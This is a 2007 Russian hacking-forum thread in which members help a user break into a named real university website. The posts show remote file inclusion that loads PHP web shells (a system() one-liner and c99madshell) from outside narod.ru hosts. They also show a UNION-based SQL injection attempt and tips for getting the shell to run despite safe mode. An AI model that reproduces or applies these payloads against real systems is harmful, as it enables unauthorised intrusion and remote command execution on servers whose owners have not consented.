ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

PHP & SQL inj
  #1  
Старый 25.09.2007, 17:04
nikoTM
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723

Репутация: 22
По умолчанию PHP & SQL inj

привет всем..люди у мя такая проблема на сайте
Цитата:
http://sicurezza.uniss.it/
есть такое index.php?p= удаленный инклудинг...но по неизвестным мне причинам он не поддерживает например такое
PHP код:
<pre><? @system($_REQUEST['c']); ?></pre>
(который я кинул в txt и впихнул в НАРОД). В результате такая страница http://ихсайт/?p=http://что-то.narod.ru/file.txt?c=ls не катит. Но что самое удивидельное когда file.txt такой
PHP код:
<? echo 'a'?>
ссылка катит..вот не пойму с чего бы?

а про SQL inj там еще есть такое
Цитата:
http://sicurezza.uniss.it/index.php?h=1&cat=-1'A
но не смог понята почиму он не принимает сам запрос такой результ
You have an error in your SQL syntax near 'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13/* ORDER BY data DESC ' at line 1
 
Ответить с цитированием

  #2  
Старый 25.09.2007, 17:39
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Мда.
1) Не в том разделе
2) http://ихсайт/?p=http://что-то.narod.ru/file.txt&c=ls
 
Ответить с цитированием

  #3  
Старый 25.09.2007, 17:53
nikoTM
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723

Репутация: 22
По умолчанию

ыы)
1. "Не в том разделе" ок..сорь)
2. http://ихсайт/?p=http://что-то.narod.ru/file.txt&c=ls ну понятно ж что так
http://sicurezza.uniss.it/index.php?p=http://axhack.narod.ru/1.txt?c=ls ))
 
Ответить с цитированием

  #4  
Старый 25.09.2007, 18:29
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

http://sicurezza.uniss.it/index.php?p=http://dermoshell.narod.ru/c99madshell.php
Safe-mode: ON (secure)
Может поэтому?
 
Ответить с цитированием

  #5  
Старый 25.09.2007, 18:32
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

не
<pre><? @system($_REQUEST['c']); ?></pre>
а
<pre><? @system(stripslashes($_REQUEST['c'])); ?></pre>
Должно работать...
=========
ИМХО не в этом там проблема но попытка не пытка

Последний раз редактировалось Ponchik; 25.09.2007 в 18:41..
 
Ответить с цитированием

  #6  
Старый 25.09.2007, 18:55
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ponchik  
не
<pre><? @system($_REQUEST['c']); ?></pre>
а
<pre><? @system(stripslashes($_REQUEST['c'])); ?></pre>
Должно работать...
=========
ИМХО не в этом там проблема но попытка не пытка
При вкл. сейф моде ничего не будет работать.
 
Ответить с цитированием

  #7  
Старый 25.09.2007, 19:06
nikoTM
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723

Репутация: 22
По умолчанию

понятно огромное спс
 
Ответить с цитированием

  #8  
Старый 25.09.2007, 19:09
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

При включенном чейф моде юзай мозг)))
Ну или security lab на крайняк, методов обхода туча)
 
Ответить с цитированием

  #9  
Старый 25.09.2007, 19:26
NeMiNeM
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
Провел на форуме:
4372175

Репутация: 1221


По умолчанию

Перемещено.

2Автор, в следующий раз будь внимательнее.
 
Ответить с цитированием

  #10  
Старый 25.09.2007, 19:51
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

функция system() почти везде отключается, если админы грамотные.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ